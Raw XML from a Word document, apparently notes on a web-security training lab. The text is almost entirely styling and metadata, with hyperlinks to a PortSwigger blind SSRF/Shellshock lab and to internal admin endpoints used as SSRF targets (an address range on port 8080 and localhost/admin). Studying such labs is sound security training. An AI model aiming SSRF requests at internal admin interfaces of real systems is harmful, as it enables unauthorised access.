    <w:p w14:paraId="0ECCBA6F" w14:textId="77777777" w:rsidR="005F4849" w:rsidRPr="00403B60" w:rsidRDefault="005F4849" w:rsidP="00A40A64">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:sectPr w:rsidR="005F4849" w:rsidRPr="00403B60" w:rsidSect="003530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DF3"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="70AA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067839"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="D9B4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292538"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="10C2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TextsAlreadyFilled" w:val="True"/>
  </w:docVars>
  <w:rsids>
    <w:rsidRoot w:val="00353082"/>
    <w:rsid w:val="002A16E9"/>
    <w:rsid w:val="00353082"/>
    <w:rsid w:val="00403B60"/>
    <w:rsid w:val="00442218"/>
    <w:rsid w:val="0046259E"/>
    <w:rsid w:val="005F4849"/>
    <w:rsid w:val="006A277F"/>
    <w:rsid w:val="0082346F"/>
    <w:rsid w:val="00A40A64"/>
    <w:rsid w:val="00B9783E"/>
    <w:rsid w:val="00E4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52A35"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{77957741-D639-4D40-A206-253EF7C79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A64"/>
    <w:pPr>
      <w:spacing w:after="0" w:line="240" w:lineRule="auto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A64"/>
    <w:pPr>
      <w:keepNext/>
      <w:keepLines/>
      <w:spacing w:before="24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A64"/>
    <w:pPr>
      <w:keepNext/>
      <w:keepLines/>
      <w:spacing w:before="4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A64"/>
    <w:pPr>
      <w:keepNext/>
      <w:keepLines/>
      <w:spacing w:before="40"/>
      <w:outlineLvl w:val="2"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:eastAsiaTheme="majorEastAsia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A64"/>
    <w:pPr>
      <w:keepNext/>
      <w:keepLines/>
      <w:spacing w:before="40"/>
      <w:outlineLvl w:val="3"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts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A64"/>
    <w:pPr>
      <w:keepNext/>
      <w:keepLines/>
      <w:spacing w:before="40"/>
      <w:outlineLvl w:val="4"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts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A64"/>
    <w:pPr>
      <w:keepNext/>
      <w:keepLines/>
      <w:spacing w:before="40"/>
      <w:outlineLvl w:val="5"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:eastAsiaTheme="majorEastAsia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A64"/>
    <w:pPr>
      <w:keepNext/>
      <w:keepLines/>
      <w:spacing w:before="40"/>
      <w:outlineLvl w:val="6"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:eastAsiaTheme="majorEastAsia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A64"/>
    <w:pPr>
      <w:keepNext/>
      <w:keepLines/>
      <w:spacing w:before="4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A64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32"/>
      <w:szCs w:val="3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6"/>
      <w:szCs w:val="26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4"/>
      <w:szCs w:val="24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72727" w:themeColor="text1" w:themeTint="D8"/>
      <w:w w:val="100"/>
      <w:kern w:val="0"/>
      <w:sz w:val="21"/>
      <w:szCs w:val="21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72727" w:themeColor="text1" w:themeTint="D8"/>
      <w:w w:val="100"/>
      <w:kern w:val="0"/>
      <w:sz w:val="21"/>
      <w:szCs w:val="21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styleId="Hyperlink">
    <w:name w:val="Hyperlink"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="004422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21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F48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swigger.net/web-security/ssrf/blind/lab-shellshock-exploit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0.1-255:8080/admin" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost/adm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To.Nguyen Truong An IT-QF</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>To.Nguyen Truong An IT-QF</cp:lastModifiedBy>
  <cp:revision>4</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2022-09-17T19:48:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2022-09-18T10:49:00Z</dcterms:modified>
</cp:coreProperties>
</file>